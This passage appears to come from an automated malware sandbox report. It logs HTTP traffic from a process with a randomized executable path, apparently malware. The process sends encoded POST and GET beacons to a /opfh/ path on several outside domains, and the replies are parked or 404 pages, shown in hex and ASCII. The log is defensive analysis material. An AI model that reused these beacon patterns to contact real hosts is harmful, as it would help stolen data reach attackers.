May 27, 2024 12:22:21.504662037 CEST	1765	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.performacetoyota.ca Origin: http://www.performacetoyota.ca Referer: http://www.performacetoyota.ca/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 76 36 47 4a 2b 55 44 4c 42 42 5a 44 75 77 6d 30 7a 53 36 2f 37 61 2b 74 38 75 76 55 70 4a 6f 74 73 55 47 64 43 73 41 57 69 37 32 51 6b 4e 2b 74 4d 41 6f 45 65 49 57 71 53 2b 49 32 65 75 74 6d 57 71 47 4b 52 6c 4e 63 4f 43 32 38 32 4e 30 2f 6c 76 68 41 72 78 41 72 65 4f 74 69 79 6d 42 73 49 69 74 46 6f 69 73 47 32 52 73 6b 4e 6c 4c 5a 33 39 4d 43 75 35 32 61 42 69 4f 79 33 5a 4d 30 41 39 6b 34 6f 61 51 38 30 47 70 39 54 68 65 63 39 36 68 74 2f 43 65 75 37 41 2b 4e 37 4f 6b 6d 79 31 54 64 62 58 73 66 4e 68 70 68 79 49 2f 78 33 58 39 66 76 56 34 66 2f 2f 31 75 6b 38 37 2b 58 67 42 59 61 7a 38 73 68 72 48 6b 5a 54 4a 31 41 65 4a 79 38 6b 35 7a 49 35 44 65 32 48 79 68 4a 77 6d 52 77 6b 69 33 49 57 45 55 76 42 6d 53 54 73 42 6f 65 6c 6f 70 71 69 31 7a 42 4f 39 4a 30 4c 48 35 35 59 6f 34 41 38 73 38 48 2b 62 48 79 73 67 51 76 6b 37 65 6c 4a 46 52 36 70 7a 55 56 34 65 76 65 67 53 6b 6d 6f 34 30 61 2b 78 48 71 72 53 56 6e 34 46 45 4c 41 6b 64 67 4a 57 64 44 55 55 72 76 31 61 35 38 53 53 74 [TRUNCATED] Data Ascii: R40L6=v6GJ+UDLBBZDuwm0zS6/7a+t8uvUpJotsUGdCsAWi72QkN+tMAoEeIWqS+I2eutmWqGKRlNcOC282N0/lvhArxAreOtiymBsIitFoisG2RskNlLZ39MCu52aBiOy3ZM0A9k4oaQ80Gp9Thec96ht/Ceu7A+N7Okmy1TdbXsfNhphyI/x3X9fvV4f//1uk87+XgBYaz8shrHkZTJ1AeJy8k5zI5De2HyhJwmRwki3IWEUvBmSTsBoelopqi1zBO9J0LH55Yo4A8s8H+bHysgQvk7elJFR6pzUV4evegSkmo40a+xHqrSVn4FELAkdgJWdDUUrv1a58SStokxdKz+PD9uFtDwgz2V42XDI5L79S+8j3OQTmckvJIIMgM1lRWPsXJwNOq0tnOt0oV1k++Q8HIxKYMsf8KiwguDQQWrgx9V7avgt5hpg30nUygyLxGotgM7ywixEEqLgRoK9UHbhTvvpHqZoSU7QU03iSGtcCwzuAnuj/fbo6D2TSxFlb/sw80G6BiLXPlu3dUNOHOqdt8QsSmxIDIq716cnO2IMZaII6DeMrAuQmBthjDM/vf9a+Oc54g/Ac/WssH4yXVBmh/7XBmXjFvDzut3YlDRbvn6lPex34lf+xk8TvHzjtAVha7atpY/flBqgJhul4ADpzxa5gzd9yCUp+KCRlcMxPYxTPNFU3497EhGoLSnF+RskSWne48apxW4gh+Yv4WMTmrUEEMbaODvRo9HlGe5gi0/TtfEI+cgYbTJfFRFrbu2xMhKryhYG09F/8meiSbwV0RDopwOY4UC4iq5uHwsrk+bH117M7iiymW7ahvMxmz/rTCt1pqFE5g0gGsUNEgOoxpPvS5i8q4rCmsjZ+cc7O7WZOckRpWW7y7wBlYkd3K960LbN5uiQmWMxeUNWLULRiXLR2q7aj1fSbxP7BgXp2pq4SijH2/K2F7aMUOjdGWyutRbRciJmS6yNq4N/wWSk7IwYnrXhiw1xtPWfRibrhQ61Kn [TRUNCATED]
May 27, 2024 12:22:21.970846891 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:21 GMT content-type: text/html; charset=utf-8 content-length: 1142 x-request-id: 9ff244fc-cc88-4c10-a614-60ac7226d6b3 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_doNgCanJMp1FKZDbFC1Al06HbQPa/KFazGlQTCr74kInLlsmUZYnfuqxj0me4qI7OhH70jbFswfPM2cISepJAw== set-cookie: parking_session=9ff244fc-cc88-4c10-a614-60ac7226d6b3; expires=Mon, 27 May 2024 10:37:21 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 6f 4e 67 43 61 6e 4a 4d 70 31 46 4b 5a 44 62 46 43 31 41 6c 30 36 48 62 51 50 61 2f 4b 46 61 7a 47 6c 51 54 43 72 37 34 6b 49 6e 4c 6c 73 6d 55 5a 59 6e 66 75 71 78 6a 30 6d 65 34 71 49 37 4f 68 48 37 30 6a 62 46 73 77 66 50 4d 32 63 49 53 65 70 4a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_doNgCanJMp1FKZDbFC1Al06HbQPa/KFazGlQTCr74kInLlsmUZYnfuqxj0me4qI7OhH70jbFswfPM2cISepJAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:21.970865965 CEST	595	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWZmMjQ0ZmMtY2M4OC00YzEwLWE2MTQtNjBhYzcyMjZkNmIzIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	63197	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:24.036463022 CEST	463	OUT	GET /opfh/?R40L6=i4up9kvrIhZylhTl+TGF8NSB39il2c4qnhHhVcZTirCO4e+BACowf4KjePAiAuddepejX0cVJHKGxf87gLVZ3yhxJ+t5gkh7Sx8ygwwh5CFsGAn8/fc7zcPpOBOJ0Z4qUeJ8jZdFyiV9&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.performacetoyota.ca Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:22:24.515012026 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:24 GMT content-type: text/html; charset=utf-8 content-length: 1534 x-request-id: dcfc4490-067b-42c5-b31d-9ec325a7ab3a cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hV3QC3E/9lMyqzjQd8VZzZhIvBpr3BUTfwqyh67fxGe9tq02UVkzg2BxVUPODbv9g4uv29WlWzH1xPBUwTG2Lg== set-cookie: parking_session=dcfc4490-067b-42c5-b31d-9ec325a7ab3a; expires=Mon, 27 May 2024 10:37:24 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 56 33 51 43 33 45 2f 39 6c 4d 79 71 7a 6a 51 64 38 56 5a 7a 5a 68 49 76 42 70 72 33 42 55 54 66 77 71 79 68 36 37 66 78 47 65 39 74 71 30 32 55 56 6b 7a 67 32 42 78 56 55 50 4f 44 62 76 39 67 34 75 76 32 39 57 6c 57 7a 48 31 78 50 42 55 77 54 47 32 4c 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hV3QC3E/9lMyqzjQd8VZzZhIvBpr3BUTfwqyh67fxGe9tq02UVkzg2BxVUPODbv9g4uv29WlWzH1xPBUwTG2Lg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:24.515049934 CEST	987	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGNmYzQ0OTAtMDY3Yi00MmM1LWIzMWQtOWVjMzI1YTdhYjNhIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	63198	185.31.240.240	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:39.040992022 CEST	720	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.pricekaboom.com Origin: http://www.pricekaboom.com Referer: http://www.pricekaboom.com/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 76 38 54 79 37 46 63 73 4d 37 2b 6f 6a 6b 69 51 31 67 67 64 46 4c 4c 46 79 6b 38 56 38 58 51 6b 73 43 33 59 57 46 4f 48 4c 49 42 52 45 31 33 4a 71 61 38 2b 6d 68 6e 39 34 51 6f 4a 74 79 78 6c 54 32 2f 4b 6f 41 38 2f 42 77 33 6b 32 70 70 48 65 4f 4c 4c 4a 6f 51 4a 41 75 4a 43 49 79 59 30 78 54 48 48 66 6f 34 2b 62 34 33 61 4c 71 42 36 7a 35 36 4a 41 53 34 45 47 64 33 59 42 4a 4b 32 45 2f 46 55 4d 37 37 2b 4d 35 6d 49 70 4b 33 65 2f 68 79 47 41 47 4b 58 4d 67 72 46 63 49 36 61 61 68 45 4a 6a 42 4d 2f 7a 32 49 4f 4b 45 37 79 33 56 68 75 44 39 7a 36 54 4c 4c 2f 79 64 64 71 6e 36 6c 54 41 2b 73 45 73 4b 4d 39 50 32 76 39 30 51 3d 3d Data Ascii: R40L6=v8Ty7FcsM7+ojkiQ1ggdFLLFyk8V8XQksC3YWFOHLIBRE13Jqa8+mhn94QoJtyxlT2/KoA8/Bw3k2ppHeOLLJoQJAuJCIyY0xTHHfo4+b43aLqB6z56JAS4EGd3YBJK2E/FUM77+M5mIpK3e/hyGAGKXMgrFcI6aahEJjBM/z2IOKE7y3VhuD9z6TLL/yddqn6lTA+sEsKM9P2v90Q==
May 27, 2024 12:22:39.695900917 CEST	1236	IN	HTTP/1.1 404 Not Found date: Mon, 27 May 2024 10:22:39 GMT server: Apache / ZoneOS last-modified: Mon, 06 Nov 2023 23:06:18 GMT etag: "1d7b-60983e6d29793" accept-ranges: bytes content-length: 7547 connection: close content-type: text/html Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404 Page Not Found</title><style>:root { --illustration-main-color: #D82E23 !important; }</style><style>.current-url { word-wrap: break-word; }</style><style type="text/css">:root { --main-text-color: #4E4E4E; --secondary-text-color: #959595; --illustration-main-color: #C3C3CC; --btn-border-radius: 0.25rem; --primary-btn-background: #C3C3CC; --primary-btn-color: #FCFCFC; --secondary-btn-background: #FCFCFC; --secondary-btn-color: #C3C3CC; --main-icon-color: #C3C3CC;}* { box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; line-height: 1.5;}html { height: 100%;}html, body { margin: 0;}body {
May 27, 2024 12:22:39.695919991 CEST	1236	IN	Data Raw: 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 Data Ascii: display: flex; flex-direction: column; padding-top: 100px; min-height: 100%; font-size: 16px; font-weight: 400; background-color: #FCFCFC;}.hidden { display: none;}.container, .hero { max-width: 78.125r
May 27, 2024 12:22:39.695933104 CEST	1236	IN	Data Raw: 72 65 6e 74 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 72 65 6d Data Ascii: rent; cursor: pointer; color: var(--main-text-color); margin-top: 5rem; display: flex;}.arrow-left { margin-right: 0.5rem; vertical-align: middle;}.arrow-left path { fill: var(--main-text-color);}.back-btn:
May 27, 2024 12:22:39.695944071 CEST	1236	IN	Data Raw: 20 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 7d 0a 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 0a 20 20 20 20 2e 63 6f 6e 74 61 Data Ascii: var(--secondary-text-color);}@media screen and (min-width: 768px) { .container { width: 85%; } .hero { flex-direction: row; } #illustration { display: block; } .text-wrapper {
May 27, 2024 12:22:39.700684071 CEST	1236	IN	Data Raw: 73 3d 22 62 61 63 6b 2d 62 74 6e 22 3e 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 2d 6c 65 66 74 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 78 6d Data Ascii: s="back-btn"><svg width="20" height="20" class="arrow-left" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path d="M19 10.6126H3.34256L10.8647 18.1347L9.99939 19L1 10.0006L10.0006 1L10.8659 1.8653L3.34256 9.38866H19V10.6126Z" fill="bl
May 27, 2024 12:22:39.700711012 CEST	1236	IN	Data Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 62 75 74 74 6f 6e 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 22 20 63 6c 61 73 73 3d 22 62 61 63 6b 2d 62 74 6e 22 3e 3c 73 76 67 20 77 69 64 74 68 3d Data Ascii: d on this server.</p><button onclick="history.back()" class="back-btn"><svg width="20" height="20" class="arrow-left" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path d="M19 10.6126H3.34256L10.8647 18.1347L9.99939 19L1 10.0006L10.0
May 27, 2024 12:22:39.700725079 CEST	381	IN	Data Raw: 74 5b 6f 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6e 29 72 65 74 75 72 6e 20 6e 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 63 3d 74 5b 6f 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6f 5d 28 63 2c 63 2e 65 78 70 6f 72 74 Data Ascii: t[o];if(void 0!==n)return n.exports;var c=t[o]={exports:{}};return e[o](c,c.exports,r),c.exports}r.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return r.d(t,{a:t}),t},r.d=(e,t)=>{for(var o in t)r.o(t,o)&&!r.o(e,o)&&Object.defineProperty(e,o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	63199	185.31.240.240	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:41.580988884 CEST	740	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.pricekaboom.com Origin: http://www.pricekaboom.com Referer: http://www.pricekaboom.com/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 76 38 54 79 37 46 63 73 4d 37 2b 6f 69 45 53 51 32 41 63 64 45 72 4c 4b 2b 45 38 56 6c 6e 51 6f 73 43 37 59 57 41 76 61 4c 64 78 52 45 55 48 4a 72 66 51 2b 6e 68 6e 39 33 77 6f 32 70 79 78 71 54 32 7a 6f 6f 41 41 2f 42 77 6a 6b 32 6f 5a 48 65 39 7a 55 49 34 51 4c 55 65 4a 45 46 53 59 30 78 54 48 48 66 6f 39 62 62 38 54 61 4c 36 78 36 38 37 43 4b 44 53 34 46 42 64 33 59 58 35 4b 79 45 2f 45 37 4d 36 6d 62 4d 2f 69 49 70 50 4c 65 78 56 6d 48 58 32 4b 52 42 41 71 55 50 4b 76 69 59 51 55 43 70 52 49 68 2b 47 49 52 50 79 6d 51 74 33 74 43 64 73 4c 42 58 4a 76 4a 6c 37 41 66 6c 37 68 4c 4e 63 59 6c 7a 39 70 58 43 6b 4f 35 69 6d 59 42 58 68 34 46 52 32 54 4c 35 58 49 6a 48 38 6d 33 47 6e 4d 3d Data Ascii: R40L6=v8Ty7FcsM7+oiESQ2AcdErLK+E8VlnQosC7YWAvaLdxREUHJrfQ+nhn93wo2pyxqT2zooAA/Bwjk2oZHe9zUI4QLUeJEFSY0xTHHfo9bb8TaL6x687CKDS4FBd3YX5KyE/E7M6mbM/iIpPLexVmHX2KRBAqUPKviYQUCpRIh+GIRPymQt3tCdsLBXJvJl7Afl7hLNcYlz9pXCkO5imYBXh4FR2TL5XIjH8m3GnM=
May 27, 2024 12:22:42.241200924 CEST	1236	IN	HTTP/1.1 404 Not Found date: Mon, 27 May 2024 10:22:42 GMT server: Apache / ZoneOS last-modified: Mon, 06 Nov 2023 23:06:18 GMT etag: "1d7b-60983e6d29793" accept-ranges: bytes content-length: 7547 connection: close content-type: text/html Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404 Page Not Found</title><style>:root { --illustration-main-color: #D82E23 !important; }</style><style>.current-url { word-wrap: break-word; }</style><style type="text/css">:root { --main-text-color: #4E4E4E; --secondary-text-color: #959595; --illustration-main-color: #C3C3CC; --btn-border-radius: 0.25rem; --primary-btn-background: #C3C3CC; --primary-btn-color: #FCFCFC; --secondary-btn-background: #FCFCFC; --secondary-btn-color: #C3C3CC; --main-icon-color: #C3C3CC;}* { box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; line-height: 1.5;}html { height: 100%;}html, body { margin: 0;}body {
May 27, 2024 12:22:42.241220951 CEST	1236	IN	Data Raw: 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 Data Ascii: display: flex; flex-direction: column; padding-top: 100px; min-height: 100%; font-size: 16px; font-weight: 400; background-color: #FCFCFC;}.hidden { display: none;}.container, .hero { max-width: 78.125r
May 27, 2024 12:22:42.241231918 CEST	448	IN	Data Raw: 72 65 6e 74 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 72 65 6d Data Ascii: rent; cursor: pointer; color: var(--main-text-color); margin-top: 5rem; display: flex;}.arrow-left { margin-right: 0.5rem; vertical-align: middle;}.arrow-left path { fill: var(--main-text-color);}.back-btn:
May 27, 2024 12:22:42.241241932 CEST	1236	IN	Data Raw: 72 2d 72 61 64 69 75 73 3a 20 76 61 72 28 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 29 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 Data Ascii: r-radius: var(--btn-border-radius); cursor: pointer; background-color: var(--primary-btn-background);}.button a { display: inline-block; padding: 0.5rem 1rem 0.5rem 1rem; font-size: 16px; font-weight: 400; text-d
